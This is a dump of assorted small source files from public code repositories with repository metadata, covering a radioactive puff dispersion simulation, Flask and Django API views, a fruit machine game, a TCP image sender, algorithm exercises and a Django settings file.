wd11_0 = METEO[tt, 0, xgrid, ygrid]
wd12_0 = METEO[tt, 0, xgrid, ygrid+1]
wd21_0 = METEO[tt, 0, xgrid+1, ygrid]
wd22_0 = METEO[tt, 0, xgrid, ygrid+1]
wd11_1 = METEO[tt+1, 0, xgrid, ygrid]
wd12_1 = METEO[tt+1, 0, xgrid, ygrid+1]
wd21_1 = METEO[tt+1, 0, xgrid+1, ygrid]
wd22_1 = METEO[tt+1, 0, xgrid, ygrid+1]
"""
wd_0 = self._bilinear_interp(wd11_0, wd12_0, wd21_0, wd22_0, 0, 0, self.grid_step_xy, self.grid_step_xy, loc.x, loc.y)
wd_1 = self._bilinear_interp(wd11_1, wd12_1, wd21_1, wd22_1, 0, 0, self.grid_step_xy, self.grid_step_xy, loc.x, loc.y)
coef = float(time % self.grid_step_time) / self.grid_step_time
return coef*(wd_1 - wd_0) + wd_0
def _bilinear_interp(self, q11, q12, q21, q22, x1, y1, x2, y2, x, y):
"""Bilinear interpolation."""
return ( q11*(x2-x)*(y2-y)/(x2-x1)/(y2-y1) + q21*(x-x1)*(y2-y)/(x2-x1)/(y2-y1)
+ q12*(x2-x)*(y-y1)/(x2-x1)/(y2-y1) + q22*(x-x1)*(y-y1)/(x2-x1)/(y2-y1) )
def main(show_plot=True, create_video=False, profile=False):
    """Entry point: run the simulation, optionally under cProfile.

    :param show_plot: display the final dose/trajectory plot
    :param create_video: dump per-step frames and assemble an AVI
    :param profile: wrap the run in cProfile and print the hottest callers
    """
    if profile:
        filename = "profile_" + __name__ + ".prof"
        cProfile.runctx("run(show_plot, create_video)", globals(), locals(), filename)
        s = pstats.Stats(filename)
        s.sort_stats("time") # "time" or "cumulative"
        s.print_stats(30)
        s.print_callers(30)
    else:
        run(show_plot, create_video)
def run(show_plot, create_video):
simulation_length = 4*60*60 # 4 hours
time_step = 2*60 # 2 minutes
puff_sampling_step = 5*time_step
activities = np.array([[.1E+16], [3.0E+16], [4.0E+16], [2.0E+16], [3.0E+16], [1.0E+16]])
source_dir = os.path.dirname(__file__)
matfile = os.path.join(source_dir, "meteo.mat")
souce_model = SimulatedSourceModel(puff_sampling_step=puff_sampling_step, activities=activities)
meteo_model = StaticMeteoModel(meteo_array=scipy.io.loadmat(matfile)["METEO"], stability_category=3)
puff_model = PuffModel(time_step=time_step, puff_sampling_step=puff_sampling_step,
source_model=souce_model)
receptors_ = []
for i in range(-20, 21):
for j in range(-20, 21):
receptors_.append(Location(j*1000.0, i*1000.0, 0.))
receptors = np.array(receptors_, dtype=Location)
receptors_ = read_receptor_locations(os.path.join(source_dir, "receptory_ETE"))
off_grid_receptors = np.array(receptors_, dtype=Location)
del receptors_
time_steps = (simulation_length // time_step)
puff_count = len(activities)
trajectories = np.zeros((time_steps + 1, puff_count, 2))
total_doses = np.zeros(receptors.shape[0])
off_grid_doses = np.zeros((simulation_length // puff_sampling_step, off_grid_receptors.shape[0]))
clock_start, time_start = time.clock(), time.time()
for i in range(time_steps):
if i % (puff_sampling_step/time_step) == 0:
print
puff_model.propagate(meteo_model, souce_model)
dose_this_round = 0.0
for j in range(len(puff_model.puffs)):
loc = puff_model.puffs[j].loc
trajectories[i + 1, j, 0] = loc.x # let all trajectories start at 0
trajectories[i + 1, j, 1] = loc.y
for j in range(receptors.shape[0]):
loc = receptors[j]
dose = nw.sum_v(puff_model.dose_at(loc))
total_doses[j] += dose
dose_this_round += dose
for j in range(off_grid_receptors.shape[0]):
loc = off_grid_receptors[j]
index = (i * time_step) // puff_sampling_step
off_grid_doses[index, j] += nw.sum_v(puff_model.dose_at(loc))
print "Total dose in period [{0:5}s .. {1:5}s]: {2:.9f}".format(i*time_step, (i+1)*time_step, dose_this_round)
if create_video:
file = os.path.join(os.path.dirname(__file__), "video", "{0:0>5}s-{1:0>5}s.jpg".format(i*time_step, (i+1)*time_step))
fig = plt.figure()
axis = fig.add_subplot(1,1,0)
total_doses_np = np.reshape(total_doses, (41, 41))
plot_trajectories(axis, trajectories[0:i + 2, ...])
plot_contour(axis, total_doses_np, 41, 41, 1.0, 5)
plot_stations(axis, off_grid_receptors)
plot_map(axis)
axis.grid(True)
fig.savefig(file)
plt.close('all')
print "Wall time:", time.time() - time_start, "s, CPU time:", time.clock() - clock_start
scipy.io.savemat(results_dir('simulation.doses_at_locations'),
{"dose_of_model": off_grid_doses})
if create_video:
file = open(os.path.join(source_dir, "video", "video.avi"), 'wb')
args = ['jpegtoavi', '-f', '10', '800', '600']
files = sorted(glob.glob(os.path.join(source_dir, "video", "*.jpg")))
args.extend(files)
subprocess.check_call(args, stdout=file)
print "Video created:", file.name;
if show_plot:
fig = plt.figure()
axis = fig.add_subplot(1,1,1)
total_doses_np = np.reshape(total_doses, (41, 41))
plot_trajectories(axis, trajectories)
plot_contour(axis, total_doses_np, 41, 41, 1.0, 5)
plot_stations(axis, off_grid_receptors)
plot_map(axis)
axis.grid(True)
plt.show()
def read_receptor_locations(path):
    """Load receptor locations from a fixed-width text file.

    Each line carries a receptor name in columns 14..41 (currently unused),
    the north coordinate in columns 42..53 and the east coordinate in
    columns 54..61.

    :return: list of :class:`Locations <asim.dispmodel.iface.Location>` with receptor locations
    """
    receptors = []
    # `with` guarantees the file is closed even if a malformed line raises;
    # iterating the file directly avoids loading it all (the original also
    # sliced `s[0:len(s)]`, a no-op copy).
    with open(path, "r") as f:
        for line in f:
            singleLine = line.rstrip()
            name = singleLine[14:42]  # currently unused
            north = float(singleLine[42:54])
            east = float(singleLine[54:62])
            receptors.append(Location(north, east, 0.))
    return receptors
if __name__ == "__main__":
main()
|
[
"matej@laitl.cz"
] |
matej@laitl.cz
|
20010f4c4d06be295511a00b1886e43b03a7ad83
|
78202fcc20ca1569302f1b6e32c34d91bd066a76
|
/04-if-d.py
|
497bd0c5832b9eac7e13e2a277ad266f0d8c1d5b
|
[] |
no_license
|
133116/xuqi4
|
45bfdd376dc7bd140848f831430995826f9aefd2
|
7284a8adaa91822d806c782a3efd7b78e107260a
|
refs/heads/master
| 2020-06-13T00:17:45.420476
| 2019-06-30T04:22:28
| 2019-06-30T04:22:28
| 194,470,934
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 54
|
py
|
# The simplest for loop: print the odd numbers from 1 to 9
# (range start=1, stop=10 exclusive, step=2).
for i in range(1,10,2):
    print(i)
|
[
"52123323+loveyouforever04@users.noreply.github.com"
] |
52123323+loveyouforever04@users.noreply.github.com
|
b55af8f3fe846910d53ffaf4dee47e939f9267f3
|
ab2e968f37364a5c6d20a5a4831c332892926059
|
/todolist/jinja2.py
|
1e5262451a566dd1a261c0569661b5e6ff8d5b9b
|
[
"MIT"
] |
permissive
|
hirune525/todolist
|
3c4ecbe634772ca3f32310edcf6eb33ec69b1d0b
|
7c3b3870b20316d02d76f8e88453e00984122f4d
|
refs/heads/master
| 2021-01-20T17:21:36.303486
| 2017-05-21T09:31:01
| 2017-05-21T09:31:01
| 90,870,021
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 402
|
py
|
# -*- coding:utf-8 -*
from jinja2 import Environment
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core.urlresolvers import reverse
from datetime import datetime
def environment(**options):
    """Jinja2 environment factory for Django's TEMPLATES setting.

    Exposes Django's ``static`` and ``url`` helpers plus ``now`` (the
    current-time callable) to every template.
    """
    env = Environment(**options)
    env.globals.update({
        'static': staticfiles_storage.url,
        'url': reverse,
        'now': datetime.now,
    })
    return env
|
[
"hirune525@gmail.com"
] |
hirune525@gmail.com
|
69d36472f023c18c789313fc3f812e22fad18dde
|
e18ea41e1ef08d8d2e6b335ae1a7b934d55ce9aa
|
/app/Game_Runner.py
|
2ac6e6284c59b8269bd77e0522253f7c41d922c5
|
[] |
no_license
|
Leigan0/fruit-machine
|
b27fd2530dad1eef3d255a700965e85679e6c977
|
f28f471816b8569c698a8b1362342ba2bee0a8b4
|
refs/heads/master
| 2020-03-12T00:29:15.017139
| 2018-05-07T19:30:55
| 2018-05-07T19:30:55
| 130,350,313
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 662
|
py
|
# coding: utf8
from app.Printer import Printer
class GameRunner:
    """Coordinates a fruit-machine spin between the machine, the player and a printer."""

    def __init__(self, machine, player, printer=None):
        # A fresh Printer per runner: the original default `printer=Printer()`
        # was evaluated once at class-definition time, so every GameRunner
        # shared the same Printer instance.
        self.player = player
        self.machine = machine
        self.printer = printer if printer is not None else Printer()

    def spin_reel(self):
        """Charge the minimum bet, spin the reels and settle the outcome."""
        self.player.debit(self.machine.MINIMUM_BET)
        self.printer.print_display(self.machine.spin_reel())
        if self.machine.prize_spin():  # was `== True`; truthiness suffices
            self._process_jackpot_win()
        else:
            self.printer.display_loss()

    def _process_jackpot_win(self):
        """Release the prize fund, announce it, and credit the player."""
        prize = self.machine.release_funds()
        self.printer.display_prizefund(prize)
        self.player.credit(prize)
|
[
"leighann.gant@gmail.com"
] |
leighann.gant@gmail.com
|
36ee9620eeabfe85272e2b9cc09128fdc7c88790
|
5fbcc0f81cf94cb5368fe4dc8f3139b56e093158
|
/beginer_to_advance/13_module_packages/testpackage/sub1/test.py
|
d6d63cf86c93bbdac6c8eae3bdd0fcfec03ef9d5
|
[] |
no_license
|
coolshree4u/repopydemo
|
ad54f263f1595cb5d374ba17f574e80b75503ff0
|
ccee973a4a616ac1aba36c74da4650a24bc1a536
|
refs/heads/master
| 2020-03-27T00:18:57.651363
| 2018-12-22T17:24:59
| 2018-12-22T17:24:59
| 145,611,907
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 71
|
py
|
# from testpackage.sub2.prime import sum_def as sum
#
# print(sum(5,6))
|
[
"mail.shree4u@gmail.com"
] |
mail.shree4u@gmail.com
|
26513b1575c8186088086d21ef93eef963590d67
|
2416f7be399dfe831ebb98578093db25886cc493
|
/send.py
|
ba411025da2b0ba4efda0cfb3f48dda497e52781
|
[] |
no_license
|
vithurson/CollabCam
|
1f91eb1167de5148eae034484b2d30aa42a491d8
|
ab5f144259118baf5c3b29eb215dd3da3ef6073d
|
refs/heads/main
| 2023-05-03T04:31:10.700984
| 2021-05-23T05:53:57
| 2021-05-23T05:53:57
| 347,302,541
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,024
|
py
|
"""Send a cropped JPEG repeatedly over TCP and report the mean send time.

Usage: send.py <resolution-index> <iterations>
"""
import sys
import time
import socket

import cv2  # fixed: was imported twice
import numpy

# Supported square crop sizes (pixels); index chosen via argv[1].
res = [2100, 1800, 1500, 1200, 900, 600, 300]

# TCP_IP = '192.168.119.197'
TCP_IP = '192.168.86.80'
# TCP_IP = 'localhost'
TCP_PORT = 5003

cur_res = res[int(sys.argv[1])]
iters = int(sys.argv[2])

# Load the source image and crop it to the requested square.
image = cv2.imread('test.jpg')
crop_image = image[0:cur_res - 1, 0:cur_res - 1]

# Save the crop at maximum JPEG quality, then re-read it for sending.
cv2.imwrite('image.jpg', crop_image, [int(cv2.IMWRITE_JPEG_QUALITY), 100])

sock = socket.socket()
sock.connect((TCP_IP, TCP_PORT))

frame = cv2.imread("image.jpg")
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 100]
result, imgencode = cv2.imencode('.jpg', frame, encode_param)
data = numpy.array(imgencode)
stringData = data.tobytes()  # fixed: ndarray.tostring() is deprecated in favour of tobytes()
lent = len(stringData)

start_time = time.time()
for i in range(iters):
    start_time1 = time.time()
    # 16-byte fixed-width length header followed by the JPEG payload.
    sock.send(str(lent).ljust(16).encode('utf-8'))
    sock.send(stringData)
    # Pacing placeholder: with a 0.0 threshold this never spins; raise the
    # constant to throttle the send rate.
    while (time.time() - start_time1) < 0.0:
        pass
end_time = time.time()

sock.close()
print("average :", (end_time - start_time) / iters)
|
[
"vithurson@github.com"
] |
vithurson@github.com
|
58a54fa4108cbfa79e7b0f6f78280f77e9ab15f5
|
0a6c04ce9a83c983558bf2a9b0622c0076b6b6c4
|
/snippets/permissions.py
|
27f7db6eab8cffcf6a64870e83d60a6a03fffc39
|
[] |
no_license
|
madhu0309/collaboratory
|
f4384affa8a489a1dc5b2614ac83d8ed2547dae1
|
5217d713d2a174e868a26ac9eb00836d006a09ad
|
refs/heads/master
| 2022-12-14T23:13:47.816593
| 2020-03-18T17:43:56
| 2020-03-18T17:43:56
| 235,501,050
| 1
| 0
| null | 2022-12-08T03:50:22
| 2020-01-22T04:52:31
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 356
|
py
|
from rest_framework import permissions
class IsOwnerOrReadOnly(permissions.BasePermission):
    """Object-level permission: anyone may read, only the owner may write."""

    def has_object_permission(self, request, view, obj):
        # Safe (read-only) methods are always allowed; for mutating methods
        # the requester must be the object's owner.
        return (
            request.method in permissions.SAFE_METHODS
            or obj.owner == request.user
        )
|
[
"madhu@micropyramid.com"
] |
madhu@micropyramid.com
|
eb96c03c1a99cd953778d8898396878ba8f407c3
|
6f09363c63cbc4589c1435e2afecb05dc771bbe9
|
/movie/views.py
|
af2c3fd549a461f514ed15148f93477a263d0c15
|
[
"MIT"
] |
permissive
|
rocity/dj-model-demo
|
c87e4b8de596cdba413bb8c6b832043bad154dd7
|
8d83669aad8f5dbe2bfd2e265bdaf1a64c5fa1da
|
refs/heads/master
| 2021-01-20T18:39:00.277497
| 2017-05-11T01:50:42
| 2017-05-11T01:50:42
| 90,925,411
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 636
|
py
|
from django.shortcuts import render
from .models import Movie, Role, Actor, Salary
# Create your views here.
def index(request):
    """List every movie with its roles, the actors cast in each role, and the
    role's salary (``None`` when no salary record exists)."""
    movies = Movie.objects.all()
    for movie in movies:
        movie.roles = Role.objects.filter(movie_id=movie.id)
        for role in movie.roles:
            role.actors = Actor.objects.filter(role_id=role.id)
            try:
                role.salary = Salary.objects.get(role_id=role.id)
            except Salary.DoesNotExist:
                # Narrowed from a blanket `except Exception`: only a genuinely
                # missing salary row should fall back to None.
                role.salary = None
    context = {
        'movie_list': movies,
    }
    return render(request, 'movie/index.html', context)
|
[
"kevin@swiftkind.com"
] |
kevin@swiftkind.com
|
617e570784932d0851ca772715cf6f7e1136ccd4
|
bd4be765931f62c11408533a5f4c345cf2e231b2
|
/officialWebsite/podcast/views.py
|
6a57cae008e2e6dc538db4217c0475d52b717e27
|
[
"MIT"
] |
permissive
|
developer-student-club-thapar/officialWebsite
|
f5c654b6fa05cade7cc2434227039a065b42d715
|
34c50bf68f774fe0d5fdbf74498fac1347c263b6
|
refs/heads/master
| 2023-04-30T02:03:54.134765
| 2023-04-21T07:10:58
| 2023-04-21T07:10:58
| 227,199,721
| 24
| 93
|
MIT
| 2023-01-18T19:25:35
| 2019-12-10T19:31:06
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 895
|
py
|
from . import models
from . import serializers
from rest_framework import generics
from rest_framework.response import Response
from rest_framework.views import APIView
from officialWebsite import podcast
# Create your views here.
"""
Podcast
PodcastGuest
PodcastSeries
PodcastGuestLink
"""
class PodcastViewset(APIView):
    """Manage Podcasts in the database."""

    def get(self, request, format=None):
        """Return every podcast, serialized as JSON."""
        podcasts = models.Podcast.objects.all()
        serializer = serializers.PodcastSerializer(podcasts, many=True)
        return Response(serializer.data)
# class podcast series
class PodcastSeriesViewset(APIView):
    """Manage Podcast Series in the database."""

    def get(self, request, format=None):
        """Return every podcast series, serialized as JSON."""
        series = models.PodcastSeries.objects.all()
        serializer = serializers.PodcastSeriesSerializer(series, many=True)
        return Response(serializer.data)
|
[
"raghav_tinker@yahoo.com"
] |
raghav_tinker@yahoo.com
|
05a2013983fd26dd25ee6bba308dd1777843f8e5
|
3786a455b602a4fa862dbfa43e72da52a06b394e
|
/apis/api_8.py
|
77a005a94ddaf665eb856e18c2a351432d650af5
|
[] |
no_license
|
lindvarl/MemoryLeak
|
82d56b093d4b2dff6ea8d7ac942491f83eb4b563
|
30054c44022adb436e0c91f99acca17674d27cb8
|
refs/heads/master
| 2020-09-08T04:31:53.511657
| 2019-11-13T09:49:52
| 2019-11-13T09:49:52
| 221,016,942
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 862
|
py
|
from flask import Flask, jsonify
import gc
import os
import logging
from objdict import ObjDict
from services.service import Service
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
from flask_restplus import Namespace, Resource
api = Namespace('Test8', description='Test 8')
service = Service()
@api.route('/thread')
class Endpoint(Resource):
    """Test 8: load a batch of blob files, release them, and report
    thread/CPU/GC statistics (memory-leak investigation endpoint)."""

    @api.doc('Test 8')
    def get(self):
        logger.info("****************************************")
        number_of_files = 100
        result = service.get_blob_files_as_regularsurfaces(number_of_files)
        l = len(result)
        # Drop the (potentially large) result and force a collection so the
        # reported GC counts reflect the post-release state.
        del result
        gc.collect()
        data = ObjDict()
        data.number_of_thread = l
        data.cpu_count = os.cpu_count()
        data.gc_get_count = list(gc.get_count())
        return jsonify(data)
|
[
"llag@equinor.com"
] |
llag@equinor.com
|
8b44374686ed67c1f722ee0b0e735e943092cf75
|
90e430684958ad7bde4c2a8b31fe34240a64b2d9
|
/test_pca.py
|
24ee36a20995dc9f65e5eb454ce6a9ff0b6e4901
|
[] |
no_license
|
caicharlesx/rmrepo_test1
|
808d7d5b9d280c7f1046d0e1bcc059ecd5e6bb02
|
3cf217be9e62e7ca0986c32100852a6fa9b2286f
|
refs/heads/main
| 2023-05-06T11:36:11.123213
| 2021-05-30T00:47:31
| 2021-05-30T00:47:31
| 372,088,676
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 93
|
py
|
# PCA via SVD: center the data, then the principal axes are the columns of
# V.T. NOTE(review): this snippet is not self-contained — it assumes `X`
# (a 2-D data matrix) and `np` (numpy) are already in scope; confirm before use.
X_centered = X - X.mean(axis=0)
U, s, V = np.linalg.svd(X_centered)
c1=V.T[:,0]  # first principal component
c2=V.T[:,1]  # second principal component
|
[
"cai.charles.x@gmail.com"
] |
cai.charles.x@gmail.com
|
072d93b784ff9415c8c17eaaa648d89e23b96c67
|
395907654b7d2c3794df4e5fea0b256faad5befe
|
/LibraryAPI/services/book_service.py
|
9dca5fa479f580ec62df037b8d77fa2f1bcc4351
|
[] |
no_license
|
syskantechnosoft/2105PythonBatch
|
9c67956ac7bba832cf21286dfb0e3421ff504e75
|
5d6ecbc6e9a4212e86a532dd749dbe79669f6931
|
refs/heads/main
| 2023-08-24T08:29:05.046864
| 2021-10-13T18:07:33
| 2021-10-13T18:07:33
| 429,123,329
| 1
| 0
| null | 2021-11-17T16:37:08
| 2021-11-17T16:37:07
| null |
UTF-8
|
Python
| false
| false
| 711
|
py
|
from abc import ABC, abstractmethod
from typing import List
from entities.book import Book
class BookService(ABC):
    """Abstract CRUD + search service for :class:`Book` entities."""

    # general CRUD functionality
    @abstractmethod
    def add_book(self, book: Book):
        """Persist a new book."""
        pass

    @abstractmethod
    def retrieve_all_books(self):
        """Return every stored book."""
        pass

    @abstractmethod
    def retrieve_book_by_id(self, book_id: int):
        """Return the book with the given id."""
        pass

    @abstractmethod
    def update_book(self, book: Book):
        """Replace the stored book having ``book``'s id."""
        pass

    @abstractmethod
    def remove_book(self, book_id: int):
        """Delete the book with the given id."""
        pass

    # NOTE(review): "tile" is almost certainly a typo for "title", but the
    # method name is part of the public interface — renaming would break
    # implementers and callers, so it is documented rather than changed.
    @abstractmethod
    def find_books_by_tile_containing(self, phrase: str) -> List[Book]:
        """Return books whose title contains *phrase*."""
        pass

    @abstractmethod
    def checkout_book(self, book_id: int) -> bool:
        """Attempt to check out a book; return True on success."""
        pass
|
[
"adaman94@gmail.com"
] |
adaman94@gmail.com
|
97bf914f49e40589d1141e279b72f8736167cf4a
|
9e64d40d36bd143c39b2e456a2576ab2b66c655d
|
/Activity/migrations/0001_initial.py
|
fcc392c76b6c8a869ace532d3543b944d77ae45f
|
[] |
no_license
|
RajuGujjalapati/DjangoApi
|
0ab9d951a5740a2458b0c080c68ab9fdea7804ce
|
de22ed6fa84eb28c0cfc49e53c68d73ae572fc3c
|
refs/heads/master
| 2022-11-09T05:51:03.482849
| 2020-06-22T05:40:43
| 2020-06-22T05:40:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 913
|
py
|
# Generated by Django 3.0.7 on 2020-06-20 14:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema: a `User` (name + timezone) table and an
    `ActivityPeriod` table linked to a user via a cascading foreign key."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('user_name', models.CharField(max_length=20)),
                ('timezone', models.TimeField()),
            ],
        ),
        migrations.CreateModel(
            name='ActivityPeriod',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # deleting a User cascades to their activity periods
                ('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Activity.User')),
            ],
        ),
    ]
|
[
"gujjalpatiraju@gmail.com"
] |
gujjalpatiraju@gmail.com
|
cc6bf555fa3f589bb8fc3e4b06e994e7daf6c6e6
|
d9ce16745c2075a6c65a4b6d52c8a47b20b74874
|
/39_MoreThanHalfNumber.py
|
b61de2a244c6ff7bfe04032c8eb7d685c3b2dd56
|
[] |
no_license
|
VCloser/CodingInterviewChinese2-python
|
150dbec390a95be50a76694387268324c6566094
|
1c963f69d8542f7741f7a07ff28e4de18d0f1377
|
refs/heads/master
| 2022-11-24T17:57:48.695231
| 2020-06-29T12:52:05
| 2020-06-29T12:52:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,851
|
py
|
import random
"""
解法一:基于Partition函数的时间复杂度为O(n)的算法
(即top n/2思想)
(修改原数组)
"""
def partition(arr, start, end):
    """In-place partition of ``arr[start:end+1]`` around a random pivot.

    After the call, elements left of the returned index are <= the pivot
    and elements right of it are >= the pivot.

    :return: final index of the pivot, or None for out-of-range bounds
    """
    if start<0 or end>len(arr):
        # NOTE(review): `end` is used as an inclusive index below, so this
        # guard arguably should be `end >= len(arr)` — confirm with callers.
        return None
    pvit = random.randint(start,end)  # random pivot guards against adversarial input
    arr[pvit],arr[start] = arr[start],arr[pvit]  # stash the pivot at the front
    left = start+1
    right = end
    while True:
        # advance both cursors past elements already on the correct side
        while left<=right and arr[left]<=arr[start]:
            left+=1
        while left<=right and arr[right]>=arr[start]:
            right-=1
        if left>right:
            break
        arr[left],arr[right] = arr[right],arr[left]
    arr[start], arr[right] = arr[right], arr[start]  # move the pivot into place
    return right
def check_more_than_half(arr, target):
    """Return True when *target* occupies strictly more than half of *arr*."""
    occurrences = sum(1 for item in arr if item == target)
    return occurrences > len(arr) // 2
def more_than_half_num_1(arr):
    """Majority element via quickselect: partition until the pivot lands on
    the middle index, then verify the median really is a majority.

    Mutates *arr* in place. Returns the majority element, 0 when none
    exists, or None for empty input.
    """
    if not arr:
        return
    mid = len(arr)>>1  # index of the median
    start = 0
    end = len(arr)-1
    index = partition(arr, start,end)
    # quickselect narrowing: only recurse into the side containing `mid`
    while (index != mid):
        if index>mid:
            end = index-1
            index = partition(arr, start,end)
        else:
            start = index+1
            index = partition(arr, start,end)
    result = arr[mid]
    # the median candidate still needs the explicit majority check
    if check_more_than_half(arr,result):
        return result
    return 0
"""
解法二:根据数组特点找出时间复杂度为O(n)的算法
(不修改原数组)
"""
def more_than_half_num_2(arr):
    """Majority element via Boyer-Moore voting: O(n) time, O(1) space,
    without modifying *arr*.

    Returns the majority element, 0 when none exists, or None for empty
    input.
    """
    if not arr:
        return
    result = arr[0]
    times = 1
    for i in range(1, len(arr)):
        if times == 0:
            # the previous candidate was fully cancelled out -> adopt a new one
            result = arr[i]
            times = 1
        elif arr[i] == result:
            # BUG FIX: the vote must compare against the current candidate
            # (`result`), not the previous element (`arr[i-1]`); the old code
            # returned 0 for inputs such as [1, 2, 2, 2, 1, 1, 1].
            times += 1
        else:
            times -= 1
    # voting only yields a candidate; confirm it truly is a majority
    # (inlined majority check so the function is self-contained)
    if arr.count(result) > len(arr) // 2:
        return result
    return 0
if __name__ == '__main__':
print(more_than_half_num_1([1,2,3,2,2,2,5,4,2]))
print(more_than_half_num_2([1,2,3,2,2,2,5,4,2]))
|
[
"1991262239@qq.com"
] |
1991262239@qq.com
|
710be652a020afe84ea98e260f63caa0375f2e49
|
405f37478f35497ba16dbe3327011bde183bf39e
|
/skillStonesSettings.py
|
f431522770b346fb3ce25005ea289d3c495ba58f
|
[] |
no_license
|
shimdh/mrd_conv
|
0258e95b67c4bb9f6311a77587b2520098b3f134
|
2e092aab16b984d88aad0a509a1b3a2112346619
|
refs/heads/master
| 2021-01-19T06:53:09.298637
| 2013-07-02T10:20:53
| 2013-07-02T10:20:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,981
|
py
|
# -*- coding: utf-8 -*-
import codecs
import os
from xlrd import open_workbook
from xmlUtils import XmlWriter
statusKeys = []
statusKeysKorean = []
ITEMS_NAMES = []
ITEMS_DESCRIPTION = []
ITEMS_STATUS_LIST = []
STATUS_TAG = 'SkillStone'
SUB_PLURAL = 'SkillStone'
TAG_PLURAL = 's'
ITEMS_SETTINGS_FILE = SUB_PLURAL + TAG_PLURAL + 'Settings'
ITEMS_SETTINGS_XML_FILE = ITEMS_SETTINGS_FILE + '.xml'
ITEMS_SETTINGS_EXCEL_FILE = ITEMS_SETTINGS_FILE + '.xls'
wbItems = open_workbook(os.getcwd() + "\\xls\\" + ITEMS_SETTINGS_EXCEL_FILE)
for s in wbItems.sheets():
for row in range(s.nrows):
values = []
if row == 0:
continue
elif row == 1:
for col in range(s.ncols):
statusKeys.append(str(s.cell(row, col).value))
else:
for col in range(s.ncols):
# values.append(str(s.cell(row, col).value))
if col in (1, ):
values.append(unicode(s.cell(row, col).value))
if col == 1:
ITEMS_DESCRIPTION.append(unicode(s.cell(row, col).value))
else:
if col == 0:
ITEMS_NAMES.append(str(s.cell(row, col).value))
values.append(str(s.cell(row, col).value))
ITEMS_STATUS_LIST.append(values)
print statusKeys
print ITEMS_STATUS_LIST
doc = XmlWriter()
items_setting = doc.createNode(ITEMS_SETTINGS_FILE)
for index in range(len(ITEMS_STATUS_LIST)):
enemy_value = doc.createNode(STATUS_TAG, items_setting)
for key, value in zip(statusKeys, ITEMS_STATUS_LIST[index]):
node_key = doc.createNode(key, enemy_value)
node_value = doc.doc.createTextNode(value)
node_key.appendChild(node_value)
# doc.printXML()
def createXmlFile(file_name):
    # Write the assembled DOM, pretty-printed, as UTF-8 under .\xml\ relative
    # to the current working directory (Windows-style path separators).
    f = codecs.open(os.getcwd() + "\\xml\\" + file_name, 'w', 'utf-8')
    f.write(doc.doc.toprettyxml())
    f.close()
createXmlFile(ITEMS_SETTINGS_XML_FILE)
|
[
"shimdh@gmail.com"
] |
shimdh@gmail.com
|
a6824ae4180a13e222ee644e775d711df4dfd926
|
2cd980e7d2e60fe3b659d23ade346e651fe4f3bb
|
/Django/cloudms/cloudms/settings.py
|
3e0af5e43cb34e52a122e34905660185663cd3f1
|
[] |
no_license
|
nbgao/Python-Project
|
79666c86e68531c6a9312576785e88ebb028a68f
|
9665aec2adb9e85ec333a1bccc014d27b15b949a
|
refs/heads/master
| 2021-01-02T23:01:12.147940
| 2019-05-03T09:05:05
| 2019-05-03T09:05:05
| 99,439,676
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,131
|
py
|
"""
Django settings for cloudms project.
Generated by 'django-admin startproject' using Django 2.0.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control - rotate it and
# load it from the environment before any production deployment.
SECRET_KEY = '$x#ie9g90-82lhsm!u_=3w80y%x)sd6t0!0kq_9l=au76e3=g@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty list: with DEBUG=True Django accepts localhost-style hosts only.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cloudms.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # project-level template dir for the msgapp, plus per-app dirs
        'DIRS': [os.path.join(BASE_DIR, "msgapp/templates")],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'cloudms.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
